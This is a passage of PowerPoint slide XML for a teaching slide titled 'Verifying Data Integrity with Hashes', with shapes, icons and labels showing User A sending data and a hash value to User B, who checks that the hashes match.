              <a:p>
                <a:pPr marL="487680" indent="-487680" defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="858" name="Data"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="112331" y="18203"/>
                <a:ext cx="670643"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marL="487680" indent="-487680" defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>Data</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="861" name="Policy_Writing01" descr="Policy_Writing01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8482471" y="6414346"/>
            <a:ext cx="835379" cy="1113086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="862" name="Hash Value"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9277866" y="7121624"/>
            <a:ext cx="1416569" cy="472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nchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Hash Value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="863" name="Policy_Writing01" descr="Policy_Writing01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8367324" y="2677724"/>
            <a:ext cx="835378" cy="1113085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="864" name="Hash Value"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8153493" y="3771081"/>
            <a:ext cx="1416569" cy="472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nchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Hash Value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="865" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="15945410">
            <a:off x="6071164" y="4472657"/>
            <a:ext cx="3117992" cy="11627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07" y="13442"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20448" y="12698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20355" y="12343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20276" y="11988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20077" y="11314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19865" y="10605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19640" y="10002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19415" y="9328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19137" y="8690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18872" y="8087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18581" y="7484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18302" y="6916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17640" y="5781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17322" y="5249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16952" y="4753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16594" y="4292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16223" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15826" y="3405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15415" y="3015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15018" y="2589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14594" y="2234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14170" y="1915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13733" y="1561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13270" y="1312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12806" y="1029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12343" y="780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11866" y="638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11389" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10913" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10158" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9390" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8886" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8237" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7906" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7588" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6953" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6344" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6026" y="567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5721" y="674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5125" y="958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4556" y="1241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3973" y="1596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3417" y="2022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887" y="2483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2344" y="3015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1841" y="3511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="4079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="4646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="424" y="5320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411" y="5462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="834" y="5001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1258" y="4575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1695" y="4185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159" y="3760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2384" y="3618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2609" y="3405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3072" y="3086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3576" y="2837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4052" y="2518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4569" y="2341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5072" y="2128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5589" y="1986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6132" y="1880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6661" y="1773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7204" y="1702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7734" y="1667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8264" y="1702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8754" y="1773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9257" y="1809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9734" y="1915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10237" y="2057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10701" y="2234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11177" y="2447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11641" y="2625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12542" y="3192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12979" y="3511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13402" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13826" y="4185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14223" y="4540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14634" y="4966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15018" y="5427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15376" y="5817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15746" y="6278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16104" y="6810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16435" y="7306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16766" y="7838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17084" y="8406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17667" y="9541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18196" y="10747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18435" y="11421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18660" y="12059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18872" y="12698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19071" y="13442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19243" y="14116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19415" y="14826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19031" y="14967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18660" y="15145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21176" y="11988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20607" y="13442"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="866" name="ServerProcess01" descr="ServerProcess01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6563359" y="4368800"/>
            <a:ext cx="1352410" cy="1038578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="867" name="Hash Algorithm"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7842651" y="4701285"/>
            <a:ext cx="1857630" cy="4729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lgn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Hash Algorithm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="9838917" y="3759199"/>
            <a:ext cx="700390" cy="11255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0998" y="7899"/>
                  <a:pt x="13398" y="15497"/>
                  <a:pt x="0" y="21600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="CC0000"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="869" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9838917" y="5692902"/>
            <a:ext cx="700390" cy="11255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0998" y="7899"/>
                  <a:pt x="13398" y="15497"/>
                  <a:pt x="0" y="21600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="CC0000"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="872" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9638453" y="4576515"/>
            <a:ext cx="2393245" cy="1266614"/>
            <a:chOff x="0" y="677"/>
            <a:chExt cx="2393244" cy="1266613"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="870" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="677"/>
              <a:ext cx="2393245" cy="1266614"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="E8F6E4"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="ADE2A1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="13500000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="871" name="If hash values match, data is valid"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15480" y="226059"/>
              <a:ext cx="2362284" cy="815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l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>If hash values match, data is valid</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="873" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3093155" y="7931573"/>
            <a:ext cx="6118579" cy="973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000" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21000" y="9000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="9000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20700" y="1800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19800" y="9000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20400" y="9000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20400" y="18000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600" y="18000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="876" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4154311" y="8326684"/>
            <a:ext cx="3996268" cy="853441"/>
            <a:chOff x="0" y="17610"/>
            <a:chExt cx="3996266" cy="853440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="874" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="17610"/>
              <a:ext cx="3996267" cy="853441"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="E8F6E4"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="ADE2A1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="13500000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="875" name="User A sends data and hash value to User B"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10430" y="36406"/>
              <a:ext cx="3975406" cy="815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1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>User A sends data and hash value to User B</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="877" name="Verifying Data Integrity with Hashes"/>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Verifying Data Integrity with Hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="882" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11033759" y="7755466"/>
            <a:ext cx="1300481" cy="605086"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1300480" cy="605084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="878" name="Oval"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1300481" cy="605085"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="99CCFF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="666699"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="2700000">
                <a:srgbClr val="969696"/>
              </a:outerShdw>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="881" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="173397" y="129660"/>
              <a:ext cx="433494" cy="345764"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="433493" cy="345762"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="879" name="Oval"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="433494" cy="345763"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="99CCFF"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="666699"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="8100000" scaled="0"/>
              </a:gradFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>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sp>
            <p:nvSpPr>
              <p:cNvPr id="880" name="Shape"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="106567" y="48622"/>
                <a:ext cx="251066" cy="2395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4550" y="8475"/>
                      <a:pt x="0" y="21600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10800" y="16200"/>
                      <a:pt x="21600" y="10800"/>
                      <a:pt x="21600" y="10800"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFCC66"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FFFFCC"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="8100000" scaled="0"/>
              </a:gradFill>
              <a:ln w="12700" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="666699"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="8100000">
                  <a:srgbClr val="000000"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="l" defTabSz="1300480">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="1300"/>
                  </a:spcBef>
                  <a:defRPr b="1" sz="2800">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="885" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11726898" y="7884159"/>
            <a:ext cx="433494" cy="347699"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="433493" cy="347697"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="883" name="Oval"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="433494" cy="347698"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="99CCFF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="666699"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="8100000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="884" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="131854" y="88735"/>
              <a:ext cx="171592" cy="173850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="FFCC66"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFFFCC"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="8100000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="666699"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="8100000">
                <a:srgbClr val="000000"/>
              </a:outerShdw>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855"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
